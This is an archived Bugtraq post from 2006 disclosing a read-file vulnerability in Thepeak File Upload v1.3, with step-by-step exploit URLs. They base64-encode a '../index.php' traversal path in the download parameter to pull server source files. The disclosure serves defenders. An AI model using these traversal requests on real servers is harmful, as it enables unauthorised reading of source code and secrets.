Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Thepeak File Upload v1.3 : Read file vulneability

from [loveha] Network Security [Permanent Link]
Subject: Thepeak File Upload v1.3 : Read file vulneability
Date: 26 Oct 2006 01:23:19 -0000 
Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Ph&#7841;m &#272;&#7913;c H&#7843;i (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : 
http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : 
http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " 
test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Thepeak File Upload v1.3 : Read file vulneability, loveha <=
Previous by Date:  Ban v0.1 (bannieres.php) File Include, mahmood ali
Next by Date:  Hosting Controller 6.1 Hotfix <= 3.2 Vulnerability, playpacific . emulacaid
Previous by Thread:  Ban v0.1 (bannieres.php) File Include, mahmood ali
Next by Thread:  Hosting Controller 6.1 Hotfix <= 3.2 Vulnerability, playpacific . emulacaid
Indexes:  [Date] [Thread] [Top] [All Lists]